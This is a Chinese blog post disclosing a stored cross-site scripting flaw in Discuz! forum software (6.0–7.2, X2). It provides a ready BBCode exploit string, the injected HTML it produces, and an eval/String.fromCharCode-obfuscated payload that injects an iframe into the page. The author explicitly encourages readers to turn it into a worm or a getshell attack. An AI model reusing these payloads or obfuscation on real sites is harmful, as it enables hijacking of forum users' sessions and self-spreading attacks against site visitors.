XSS漏洞的测试案例分析如下:
2009年一次偶然间测试发现的此XSS漏洞,因为是存储型的,我想大家应该知道它的危害吧。相隔这么多年Discuz不断的更新版本,但此XSS漏洞依然存在。
在此我要感谢一下我的好朋友Jackal在09年的时候一起帮我测试漏洞的。当时我们一起测试的是Discuz6.0-Discuz7.2,不知道是不是通杀啊。没有一个一个去测试。有条件的去测试一下吧。
发贴进入源码模式,写入如下的exp
- [email][url][img]http://www.linuxso.com onmouseover=alert(/DZ-xss-0day/); [/img] [/url][/email]
上面代码是以鼠标事件来触发XSS的,剩下的大家可以自行发挥构造!
附上XSS完的源码如下:
- <a href="mailto:"></a><a href="%5C%22http://qhkest.com" onmouseover="alert(/DZ-xss-0day/);" \"="" target="\"_blank\""><img src="http://qhkest.com%20onmouseover=alert%28/DZ-xss-0day/%29;" onload="thumbImg(this)" alt=""> </a><
我想你们一看就明白了吧!
漏洞证明:
本地测试结果:
Discuz! X2
以下应用华东耶稣的话:鸡肋在于,要鼠标触碰才能触发,但是,鼠标触碰还是概率很大很大的嘛。
把上面的alert(/DZ-XSS-0DAY/)换成
- eval(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,100,105,115,112,108,97,
- 121,61,34,110,111,110,101,34,59,102,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,
- 101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,102,46,115,114,99,61,
- 34,104,116,116,112,58,47,47,119,119,119,46,98,97,34,43,34,105,100,117,46,99,111,109,34,59,
- 102,46,104,101,105,103,104,116,61,34,51,48,48,34,59,102,46,119,105,100,116,104,61,34,51,48,
- 48,34,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,
- 84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,
- 105,108,100,40,102,41,59))
鼠标触碰效果:
加密过程,就是10进制加密啦,如图。
解密下看下代码。
好了,希望看完的朋友能写出个蠕虫,或者写个直接getshell的东西。我记得曾经有人写过dz的xss直接getshell的。
Discuz和多版本爆存储型XSS漏洞的介绍就结束了,有兴趣的朋友请继关注此类资源。
【编辑推荐】